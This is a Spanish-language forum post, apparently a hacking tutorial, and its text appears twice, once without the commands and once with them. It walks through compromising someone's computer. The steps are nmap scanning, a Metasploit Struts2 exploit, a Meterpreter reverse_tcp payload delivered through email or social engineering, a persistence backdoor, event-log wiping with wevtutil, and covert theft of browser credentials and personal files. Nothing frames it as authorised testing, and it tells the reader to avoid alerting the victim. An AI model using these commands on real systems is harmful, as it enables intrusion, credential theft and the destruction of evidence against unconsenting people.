Este tutorial proporciona información general sobre las etapas y técnicas involucradas en el hacking remoto de un sistema informático. Sirve como una introduccion a las tácticas para comprometer un sistema:
La verdad no se como hacen para que salga lo de "Debes responder y dar like al contenido oculto antes de poder visualizarlo." pero seria de ayuda y me motivaria a publicar mas tutoriales como estos
Paso 1:
Escaneo de puertos
Utiliza una herramienta como Nmap para escanear los puertos abiertos en la computadora objetivo. Este paso te permitirá identificar posibles puntos de entrada al sistema. Remplaza "IP_objetivo" por la direccion IP de la computadora que deseas escanear
Este comando explorará todos los puertos posibles (1-65535) en la computadora objetivo y te mostrará cuáles están abiertos.
Paso 2:
Identificacion de vulnerabilidades
Una vez que hayas identificado los puertos abiertos, utiliza Metasploit u otras herramientas similares para buscar vulnerabilidades conocidas en el sistema objetivo. Estas vulnerabilidades pueden ser explotadas para obtener acceso al sistema. Inicia Metasploit ejecutando el siguiente comando:
una vez cargado utiliza el siguiente comando "search" seguido del nombre del servicio asociado al puerto abierto que encontraste en el escaneo de Nmap. Por ejemplo, si el puerto abierto es 80 y el servicio es HTTP escribe lo siguiente:
Esto revelará una lista de exploits. Para elegir un exploit, escribe el comando "use", seguido del nombre del exploit:
Configura el exploit con la dirección IP y el puerto objetivo:
para ver si hay más opciones que debes configurar para el exploit seleccionado utiliza el siguiente comando:
Cuando hayas configurado todas las opciones necesarias ya puedes intentar explotar la vulnerabilidad en el sistema objetivo
:
Paso 3:
Seleccion del exploit y creacion del payload
Después de explotar con éxito una vulnerabilidad en el sistema objetivo, debes crear un payload que te permita controlar el sistema de forma remota. Busca un payload compatible con tu exploit y el sistema objetivo. Por ejemplo, si estás apuntando a un sistema Windows, busca un payload de Meterpreter para Windows:
luego
Configura las opciones necesarias para el payload. LHOST y LPORT, son la dirección IP y el puerto de escucha en tu propia máquina
Genera el payload y guardalo en un archivo especifico, yo en mi caso lo llamare payload.exe pero tu lo puedes llamar como quieras
Envía el payload al sistema objetivo utilizando métodos como el correo electrónico, la ingeniería social o cualquier otra forma de entregar el archivo.
Paso 4:
Establecimiento de persistencia
Mantener el acceso y cubrir tus huellas
. Una vez que hayas comprometido el sistema y establecido el control remoto, es posible que desees mantener el acceso al sistema para futuras actividades. Para hacer esto, puedes instalar una puerta trasera (backdoor)
en el sistema objetivo. Una puerta trasera es una forma de acceder al sistema sin que se detecte y sin tener que explotar la vulnerabilidad nuevamente.
En Metasploit, busca un módulo de post-explotación adecuado para instalar una puerta trasera:
Selecciona el módulo de post-explotación "persistence" para mantener el acceso:
Configura las opciones necesarias, como RHOSTS (IP objetivo), LHOST (tu IP) y LPORT (puerto de escucha):
Ejecuta el módulo de post-explotación para instalar la puerta trasera:
Después de instalar la puerta trasera, asegúrate de cubrir tus huellas borrando cualquier rastro de tus actividades en el sistema. Esto puede incluir eliminar archivos temporales, borrar registros y eliminar cualquier otro indicio que pueda revelar tu presencia en el sistema.
Paso 5:
Ocultar huellas
Cubre tus huellas para evitar ser detectado. Esto puede incluir la eliminación de registros de eventos, archivos temporales y otros rastros que puedan llevar a tu identificación. Utiliza herramientas y comandos específicos para borrar registros de eventos en el sistema objetivo. Por ejemplo, en un sistema Windows, podrías usar el comando "wevtutil":
Paso 6:
Recopilación de datos
Con acceso al sistema, ahora puedes recopilar datos valiosos, como contraseñas, información personal y otros datos sensibles. Asegúrate de hacerlo de manera discreta para no alertar a la víctima.
1. Uso del módulo "credentials" en Metasploit:
para buscar y almacenar credenciales carga el modulo "credentials"
busca módulos de post-explotación relacionados con la recopilación de credenciales con el comando "search". Por ejemplo:
Por ejemplo, para recopilar contraseñas almacenadas en navegadores web, podrías utilizar el módulo "enum_chrome":
Comprueba las opciones disponibles:
Configura las opciones necesarias, como SESSION, que indica la sesión de Meterpreter en la que estás trabajando:
ejecuta el modulo:
El módulo comenzará a buscar y recopilar las credenciales almacenadas en el sistema objetivo. Dependiendo del módulo que estés utilizando, los datos recopilados pueden incluir contraseñas almacenadas, hashes de contraseñas, cookies
Además, puedes buscar archivos que contengan información confidencial o personal navegando por los directorios del sistema y copiando cualquier archivo relevante a tu máquina local.
Por favor les invito a corregirme o hacer preguntas o agregar algo, ya especifique es esto es muy general y lo he hecho un poco cansado para aportar a la comunidad
La verdad no se como hacen para que salga lo de "Debes responder y dar like al contenido oculto antes de poder visualizarlo." pero seria de ayuda y me motivaria a publicar mas tutoriales como estos
Paso 1:
Escaneo de puertos
Utiliza una herramienta como Nmap para escanear los puertos abiertos en la computadora objetivo. Este paso te permitirá identificar posibles puntos de entrada al sistema. Remplaza "IP_objetivo" por la direccion IP de la computadora que deseas escanear
nmap -p- IP_objetivo Este comando explorará todos los puertos posibles (1-65535) en la computadora objetivo y te mostrará cuáles están abiertos.
Paso 2:
Identificacion de vulnerabilidades
Una vez que hayas identificado los puertos abiertos, utiliza Metasploit u otras herramientas similares para buscar vulnerabilidades conocidas en el sistema objetivo. Estas vulnerabilidades pueden ser explotadas para obtener acceso al sistema. Inicia Metasploit ejecutando el siguiente comando:
msfconsoleuna vez cargado utiliza el siguiente comando "search" seguido del nombre del servicio asociado al puerto abierto que encontraste en el escaneo de Nmap. Por ejemplo, si el puerto abierto es 80 y el servicio es HTTP escribe lo siguiente:
search httpEsto revelará una lista de exploits. Para elegir un exploit, escribe el comando "use", seguido del nombre del exploit:
use exploit/multi/http/struts2_content_type_ognlConfigura el exploit con la dirección IP y el puerto objetivo:
set RHOSTS IP_objetivo y set RPORT Puerto_objetivopara ver si hay más opciones que debes configurar para el exploit seleccionado utiliza el siguiente comando:
show optionsCuando hayas configurado todas las opciones necesarias ya puedes intentar explotar la vulnerabilidad en el sistema objetivo
exploitPaso 3:
Seleccion del exploit y creacion del payload
Después de explotar con éxito una vulnerabilidad en el sistema objetivo, debes crear un payload que te permita controlar el sistema de forma remota. Busca un payload compatible con tu exploit y el sistema objetivo. Por ejemplo, si estás apuntando a un sistema Windows, busca un payload de Meterpreter para Windows:
search meterpreterluego
use payload/windows/meterpreter/reverse_tcpConfigura las opciones necesarias para el payload. LHOST y LPORT, son la dirección IP y el puerto de escucha en tu propia máquina
set LHOST tu_IP y set LPORT puerto_escuchaGenera el payload y guardalo en un archivo especifico, yo en mi caso lo llamare payload.exe pero tu lo puedes llamar como quieras
generate -f payload.exeEnvía el payload al sistema objetivo utilizando métodos como el correo electrónico, la ingeniería social o cualquier otra forma de entregar el archivo.
Paso 4:
Establecimiento de persistencia
Mantener el acceso y cubrir tus huellas
En Metasploit, busca un módulo de post-explotación adecuado para instalar una puerta trasera:
search post/windows/manageSelecciona el módulo de post-explotación "persistence" para mantener el acceso:
use post/windows/manage/persistenceConfigura las opciones necesarias, como RHOSTS (IP objetivo), LHOST (tu IP) y LPORT (puerto de escucha):
set RHOSTS IP_objetivo
set LHOST tu_IP
set LPORT puerto_escuchaEjecuta el módulo de post-explotación para instalar la puerta trasera:
runDespués de instalar la puerta trasera, asegúrate de cubrir tus huellas borrando cualquier rastro de tus actividades en el sistema. Esto puede incluir eliminar archivos temporales, borrar registros y eliminar cualquier otro indicio que pueda revelar tu presencia en el sistema.
Paso 5:
Ocultar huellas
Cubre tus huellas para evitar ser detectado. Esto puede incluir la eliminación de registros de eventos, archivos temporales y otros rastros que puedan llevar a tu identificación. Utiliza herramientas y comandos específicos para borrar registros de eventos en el sistema objetivo. Por ejemplo, en un sistema Windows, podrías usar el comando "wevtutil":
wevtutil cl Applicationwevtutil cl Securitywevtutil cl SystemPaso 6:
Recopilación de datos
Con acceso al sistema, ahora puedes recopilar datos valiosos, como contraseñas, información personal y otros datos sensibles. Asegúrate de hacerlo de manera discreta para no alertar a la víctima.
1. Uso del módulo "credentials" en Metasploit:
para buscar y almacenar credenciales carga el modulo "credentials"
msfconsolebusca módulos de post-explotación relacionados con la recopilación de credenciales con el comando "search". Por ejemplo:
search post/windows/gather Aquí, estamos buscando módulos de post- explotación específicos para sistemas Windows que estén relacionados con la recopilación de datos.Por ejemplo, para recopilar contraseñas almacenadas en navegadores web, podrías utilizar el módulo "enum_chrome":
use post/windows/gather/enum_chromeComprueba las opciones disponibles:
show optionsConfigura las opciones necesarias, como SESSION, que indica la sesión de Meterpreter en la que estás trabajando:
set SESSION <id_de_sesion>ejecuta el modulo:
runEl módulo comenzará a buscar y recopilar las credenciales almacenadas en el sistema objetivo. Dependiendo del módulo que estés utilizando, los datos recopilados pueden incluir contraseñas almacenadas, hashes de contraseñas, cookies
Además, puedes buscar archivos que contengan información confidencial o personal navegando por los directorios del sistema y copiando cualquier archivo relevante a tu máquina local.
Por favor les invito a corregirme o hacer preguntas o agregar algo, ya especifique es esto es muy general y lo he hecho un poco cansado para aportar a la comunidad